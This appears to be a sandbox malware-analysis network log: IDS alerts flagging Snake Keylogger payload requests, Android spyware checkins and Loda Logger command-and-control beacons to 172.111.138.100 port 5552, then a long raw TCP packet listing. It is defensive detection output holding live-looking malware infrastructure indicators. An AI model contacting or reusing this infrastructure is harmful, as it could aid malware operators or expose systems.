2024-12-30T11:48:31.198826+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49753 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49879 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49796 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49747 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49720 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49837 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:55.785865+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49715 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:55.786424+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49714 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:55.800485+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49720 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:56.102426+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.8 | 49718 | 69.42.215.252 | 80 | TCP
2024-12-30T11:48:57.211247+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49722 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:57.221241+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49721 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:58.236748+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49729 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:58.261093+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49730 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:59.261008+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49734 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:59.263918+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.8 | 49735 | 142.250.185.78 | 443 | TCP
2024-12-30T11:49:04.845921+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49747 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:13.865993+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49753 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:15.387383+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.8 | 49755 | 69.42.215.252 | 80 | TCP
2024-12-30T11:49:22.892519+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49796 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:31.988356+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49837 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:41.048759+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.8 | 49879 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:58.562265+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.8 | 49879 | TCP
2024-12-30T11:50:36.168810+0100 | 2830912 | ETPRO MALWARE Loda Logger CnC Beacon Response M2 | 1 | 172.111.138.100 | 5552 | 192.168.2.8 | 49879 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                            Dec 30, 2024 11:48:41.267126083 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.267163992 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.267690897 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.267750978 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.268184900 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.268245935 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.345256090 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.345335007 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.351375103 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.351416111 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.351444006 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.351458073 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.351473093 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.351500034 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.352399111 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.352432013 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.352461100 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.352466106 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.352514029 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.352514029 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.353228092 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.353286028 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.353976011 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.354027987 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.423392057 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.423553944 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.429830074 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.429873943 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.429944038 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.429963112 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.429974079 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.430005074 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.435918093 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.435956955 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436014891 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436022043 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436059952 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436079025 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436300993 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436361074 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436683893 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436718941 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436731100 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436734915 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.436760902 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.436779976 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.437534094 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.437573910 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.437616110 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.437621117 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.437648058 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.437668085 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.438441992 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.438477993 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.438497066 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.438502073 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.438525915 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.438549995 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.439248085 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.439296007 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.439297915 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.439307928 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.439347029 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.439356089 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.501918077 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.502037048 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.507742882 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.507812023 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.514146090 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.514178038 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.514219999 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.514228106 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.514242887 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.514266014 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.514328957 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.514373064 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.520262003 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.520318985 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.520430088 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.520467997 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.520478010 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.520483971 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.520494938 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.520523071 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.521110058 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.521146059 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.521167040 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.521172047 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.521198034 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.521215916 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.521962881 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.521994114 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522017002 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522021055 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522043943 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522059917 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522653103 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522687912 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522702932 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522706985 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522717953 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522735119 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522767067 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.522770882 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.522806883 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.523574114 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.523607969 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.523631096 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.523633957 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.523643970 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.523657084 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.523688078 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.524507046 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.524548054 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.524571896 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.524576902 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.773884058 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.775579929 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.775623083 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.775640965 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.775645018 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.775675058 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.775679111 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.775693893 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.775697947 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.775727034 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.775751114 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.775916100 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.775958061 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.775969982 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.775974035 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.775994062 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.775994062 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776020050 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776024103 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776050091 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776073933 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776101112 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776148081 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776320934 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776377916 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776377916 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776386023 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776422024 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776478052 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776529074 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776532888 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776542902 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776583910 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776590109 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776638031 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776865005 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776902914 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776925087 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776928902 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776946068 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.776948929 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776973009 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.776976109 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.777033091 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.839533091 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.839629889 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.845700979 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.845747948 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.845760107 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.845767021 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.845788956 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.845809937 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.852092981 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.852158070 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.852264881 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.852298975 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.852319002 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.852324963 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.852334023 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.852353096 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.852366924 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.858268023 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.858335972 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.858427048 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.858477116 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.858477116 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.858485937 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.858527899 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860213995 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860256910 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860272884 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860276937 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860301971 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860321999 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860328913 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860373020 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860375881 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860383034 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860419989 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860446930 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860451937 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860460997 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860490084 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860622883 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860677004 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860723019 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860763073 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860764980 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860776901 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860801935 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860816002 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860825062 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.860843897 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.860862970 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861088037 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861141920 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861145020 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861150980 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861201048 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861208916 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861242056 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861252069 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861263990 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861277103 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861294985 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861299992 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861323118 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861349106 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861391068 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861423016 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861438990 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861444950 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.861480951 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.861501932 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:41.924124956 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:41.924200058 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.113562107 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.113571882 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.113595009 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.113598108 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.113622904 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.113648891 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.113723993 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.113782883 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.113795996 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.113840103 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.113848925 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.113852978 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.113876104 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.113898993 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.113981009 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.114032030 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.114274979 CET4434970523.109.93.100192.168.2.8
